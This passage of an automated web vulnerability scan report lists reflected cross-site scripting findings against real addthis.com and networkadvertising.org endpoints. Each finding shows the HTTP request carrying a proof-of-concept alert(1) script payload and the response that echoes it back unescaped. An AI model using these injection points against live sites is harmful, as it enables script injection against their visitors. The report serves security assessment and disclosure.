Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naid61da"-alert(1)-"b9dc2959915/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.103. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c572c"-alert(1)-"e8f41cea6ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/optoutc572c"-alert(1)-"e8f41cea6ae?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:53:57 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optoutc572c"-alert(1)-"e8f41cea6ae";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.104. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70a8d<script>alert(1)</script>6bae58f3589 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optout70a8d<script>alert(1)</script>6bae58f3589?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:53:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optout70a8d<script>alert(1)</script>6bae58f3589?nocache=0.5840976</strong>
...[SNIP]...

2.105. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout-verify

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c31b"-alert(1)-"a0e1e03807b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api5c31b"-alert(1)-"a0e1e03807b/nai/optout-verify HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0000000000000000

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:55:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1383
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api5c31b"-alert(1)-"a0e1e03807b/nai/optout-verify";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.106. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout-verify

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e6b99<script>alert(1)</script>245b75cf452 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apie6b99<script>alert(1)</script>245b75cf452/nai/optout-verify HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0000000000000000

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:55:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1409
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>apie6b99<script>alert(1)</script>245b75cf452/nai/optout-verify</strong>
...[SNIP]...

2.107. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout-verify

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d89b8<script>alert(1)</script>32e35263c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/naid89b8<script>alert(1)</script>32e35263c4/optout-verify HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0000000000000000

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:55:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1407
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/naid89b8<script>alert(1)</script>32e35263c4/optout-verify</strong>
...[SNIP]...

2.108. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout-verify

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1608"-alert(1)-"112d1b68c48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naif1608"-alert(1)-"112d1b68c48/optout-verify HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0000000000000000

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:55:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1383
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naif1608"-alert(1)-"112d1b68c48/optout-verify";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.109. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout-verify

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 30153<script>alert(1)</script>7e9d65febf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optout-verify30153<script>alert(1)</script>7e9d65febf4 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0000000000000000

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:55:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1409
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optout-verify30153<script>alert(1)</script>7e9d65febf4</strong>
...[SNIP]...

2.110. http://www.addthis.com/api/nai/optout-verify [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout-verify

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 923fc"-alert(1)-"2f9bc4d369f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/optout-verify923fc"-alert(1)-"2f9bc4d369f HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0000000000000000

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:55:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1383
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optout-verify923fc"-alert(1)-"2f9bc4d369f";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.111. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 954f2<script>alert(1)</script>f208b64faaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api954f2<script>alert(1)</script>f208b64faaa/nai/status?nocache=0.5260989 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:52:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api954f2<script>alert(1)</script>f208b64faaa/nai/status?nocache=0.5260989</strong>
...[SNIP]...

2.112. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0cc5"-alert(1)-"243e6b809c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apie0cc5"-alert(1)-"243e6b809c8/nai/status?nocache=0.5260989 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apie0cc5"-alert(1)-"243e6b809c8/nai/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.113. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b29e4<script>alert(1)</script>a45ac8223c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/naib29e4<script>alert(1)</script>a45ac8223c6/status?nocache=0.5260989 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:52:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/naib29e4<script>alert(1)</script>a45ac8223c6/status?nocache=0.5260989</strong>
...[SNIP]...

2.114. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cad07"-alert(1)-"576553a76a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naicad07"-alert(1)-"576553a76a9/status?nocache=0.5260989 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:52:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naicad07"-alert(1)-"576553a76a9/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.115. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdde2"-alert(1)-"1e93ac1c370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/statuscdde2"-alert(1)-"1e93ac1c370?nocache=0.5260989 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:52:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/statuscdde2"-alert(1)-"1e93ac1c370";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.116. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 356d5<script>alert(1)</script>25ea278e678 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/status356d5<script>alert(1)</script>25ea278e678?nocache=0.5260989 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:52:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/status356d5<script>alert(1)</script>25ea278e678?nocache=0.5260989</strong>
...[SNIP]...

2.117. http://www.networkadvertising.org/managing/opt_out_intl.asp [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out_intl.asp

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757d9"><script>alert(1)</script>59c5b799a0d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /managing/opt_out_intl.asp?lang=span757d9"><script>alert(1)</script>59c5b799a0d HTTP/1.1
Host: www.networkadvertising.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 13 Nov 2011 18:55:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 12 Nov 2011 18:55:38 GMT
Cache-control: no-cache


<script>
if(location.hostname != 'www.networkadvertising.org') {
window.location="http://www.networkadvertising.org/managing/opt_out.asp";
}
</script>

<script>
//_________________________
...[SNIP]...
<input type="hidden" name="lang" value="span757d9"><script>alert(1)</script>59c5b799a0d">
...[SNIP]...

2.118. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The value of the yahoo_token request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8be01'><script>alert(1)</script>0b8cdcc28cf was submitted in the yahoo_token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Content-Length: 917
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBSQACB=DAINFHGCOAJAKNNELKEDEJJG; __utma=1.531142215.1321210307.1321210307.1321210307.1; __utmb=1; __utmc=1; __utmz=1.1321210307.1.1.utmccn=(referral)|utmcsr=turn.com|utmcct=/|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
optThis=67&optThis=68&optThis=69&optThis=70&optThis=71&optThis=72&optThis=73&optThis=74&optThis=75&optThis=76&optThis=77&optThis=78&optThis=79&AOLOptThis=1&TribalOptThis=1&yahoo_token=cVRuZVptSHJ4UjM-8be01'><script>alert(1)</script>0b8cdcc28cf

Response

HTTP/1.1 200 OK
Connection: close
